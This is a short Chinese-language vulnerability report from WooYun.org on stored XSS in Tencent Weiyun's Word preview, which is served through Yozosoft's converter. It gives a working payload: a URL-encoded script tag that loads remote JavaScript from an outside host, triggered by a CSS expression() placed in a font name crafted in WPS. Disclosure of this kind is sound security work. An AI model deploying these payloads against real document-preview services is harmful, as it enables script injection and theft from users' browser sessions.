WooYun.org

知道腾讯微云是在qq群里图片预览。

登陆网页版http://www.weiyun.com/disk/index.html
发现能上传word，用的是http://www.yozosoft.com/office/fileconvert.jsp的office预览功能，本次重点测试该预览的过滤效果。
word的内容为xss代码直接被编码，于是测试字体功能

字体的名字有31字节限制，这个就是利用style 的expression。
发现预览会自动把前170字节的内容作为title，这样把内容设为
unescape("%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%6D%78%6B%2E%6F%72%67%2F%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E")
字体设为
expression(eval(document.title)) //32字节，长度不满足
expression(eval($('title')) // 长度满足，但单引号、双引号被过滤，还是不行
就可以xss了。但利用就在弹框框阶段。
为了利用最大化，我想到了抓包和wps。
我试了wps。wps重写了字体对话框，其复杂文中字体长度则不受限制。

于是写一个文档，内容为
%3C%73%63%72%69%70%74%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%74%6D%78%6B%2E%6F%72%67%2F%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E
复杂文中字体设为
expression(document.write(unescape(document.title)))
上传，在ie等的环境下，测试成功。